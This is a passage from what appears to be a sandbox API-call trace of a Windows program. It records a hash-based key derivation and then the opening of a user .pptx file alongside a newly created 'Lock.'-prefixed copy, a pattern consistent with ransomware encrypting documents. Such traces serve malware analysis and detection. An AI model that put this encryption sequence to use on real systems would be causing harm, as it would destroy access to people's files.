lpsz="SSA1A0070620F") returned 0xd [0151.808] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.820] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.820] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.820] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.820] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.820] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.820] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.820] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.820] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.821] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.821] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.821] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.821] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.821] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.821] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.821] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.821] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.821] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.821] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.821] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.821] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0151.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa3a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0151.821] CryptCreateHash (in: hProv=0x9bee68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0151.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0151.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0151.822] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0151.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0151.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0151.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.822] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.822] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.822] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.822] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.822] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0151.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa4f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0151.822] CryptHashData (hHash=0x9e1fb8, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0151.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.822] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.822] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.822] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.823] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.823] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.823] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.823] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.823] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.823] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.823] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0151.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa4b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0151.823] CryptDeriveKey (in: hProv=0x9bee68, Algid=0x6601, hBaseData=0x9e1fb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e20b8) returned 1 [0151.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.823] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.823] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.823] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.823] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.823] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0151.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0151.824] CryptDestroyHash (hHash=0x9e1fb8) returned 1 [0151.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.824] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/V7-K_kNP-.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\v7-k_knp-.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8 [0151.824] SetFilePointerEx (in: hFile=0x4f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.824] SetFilePointerEx (in: hFile=0x4f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0151.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0151.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0151.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0151.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0151.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0151.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.826] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0151.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0151.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0151.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0151.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0151.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.V7-K_kNP-.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.v7-k_knp-.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0151.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0151.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0151.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0151.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0151.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0151.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0151.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0151.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0151.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0151.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 